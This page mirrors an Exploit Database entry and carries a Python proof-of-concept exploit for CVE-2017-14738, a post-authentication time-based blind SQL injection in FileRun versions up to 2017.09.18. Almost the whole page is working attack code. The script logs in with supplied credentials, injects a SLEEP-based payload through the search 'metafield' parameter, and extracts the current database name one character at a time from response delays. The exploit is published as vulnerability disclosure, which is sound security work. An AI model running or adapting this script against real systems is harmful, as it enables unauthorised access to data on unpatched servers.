FileRun < 2017.09.18 - SQL Injection

• Exploit Database
• 128 阅读

• 作者： SPARC
  日期： 2017-09-29
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/42922/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101

  #!/usr/bin/env python # Exploit Title: FileRun <=2017.09.18 # Date: September 29, 2017 # Exploit Author: SPARC # Vendor Homepage: https://www.filerun.com/ # Software Link: http://f.afian.se/wl/?id=EHQhXhXLGaMFU7jI8mYNRN8vWkG9LUVP&recipient=d3d3LmZpbGVydW4uY29t # Version: 2017.09.18 # Tested on: Ubuntu 16.04.3, Apache 2.4.7, PHP 7.0 # CVE : CVE-2017-14738 #   import sys,time,urllib,urllib2,cookielib from time import sleep   print """ #===============================================================# | | |___| | | |\___ \__ \ _ \ __ \__|_ \__| _` || || | |__/ | | |__/ | ( || |_____/.__/ \___|_|_|\__|\___|_|\__,_|| | _|| | | | FileRun <= 2017.09.18 | | BlindSQLi Proof of Concept (Post Authentication)| |by Spentera Research (research[at]spentera.id) | | | #===============================================================# """     host = raw_input("[*] Target IP: ") username = raw_input("[*] Username: ") password = raw_input("[*] Password: ") target = &apos;http://%s/?module=search&section=ajax&page=grid&apos; %(host) delay=1 global cookie,data       def masuk(usr,pswd): log_data = { &apos;username&apos;: usr, &apos;password&apos;: pswd } post_data = urllib.urlencode(log_data) cookjar = cookielib.CookieJar() opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cookjar)) try: req = urllib2.Request(&apos;http://%s/?module=fileman&page=login&action=login&apos;%(host), post_data) content = opener.open(req) global data,cookie data = dict((cookie.name, cookie.value) for cookie in cookjar) cookie = ("language=english; FileRunSID=%s"%(data[&apos;FileRunSID&apos;])) return str(content.read()) except: print &apos;\n[-] Uh oh! Exploit fail.. PLEASE CHECK YOUR CREDENTIAL&apos; sys.exit(0)   def konek(m,n): #borrow from SQLmap :) query=("7) AND (SELECT * FROM (SELECT(SLEEP(%s-(IF(ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),%s,1))>%s,0,1)))))wSmD) AND (8862=8862" %(delay,m,n)) values = { &apos;metafield&apos;: query, &apos;searchType&apos;: &apos;meta&apos;, &apos;keyword&apos;: &apos;work&apos;, &apos;searchPath&apos;: &apos;/ROOT/HOME&apos;, &apos;path&apos;: &apos;/ROOT/SEARCH&apos; } req = urllib2.Request(target, urllib.urlencode(values)) req.add_header(&apos;Cookie&apos;, cookie) try: starttime=time.time() response = urllib2.urlopen(req) endtime = time.time() return int(endtime-starttime) except: print &apos;\n[-] Uh oh! Exploit fail..&apos; sys.exit(0)   print "[+] Logging in to the application..." sleep(1) cekmasuk = masuk(username,password) if u&apos;success&apos; in cekmasuk: print "[*] Using Time-Based method with %ds delay."%int(delay) print "[+] Starting to dump current database. This might take time.." sys.stdout.write(&apos;[+] Target current database is: &apos;) sys.stdout.flush()   starttime = time.time() for m in range(1,256): for n in range(32,126): wkttunggu = konek(m,n) if (wkttunggu < delay): sys.stdout.write(chr(n)) sys.stdout.flush() break endtime = time.time() print "\n[+] Done in %d seconds" %int(endtime-starttime)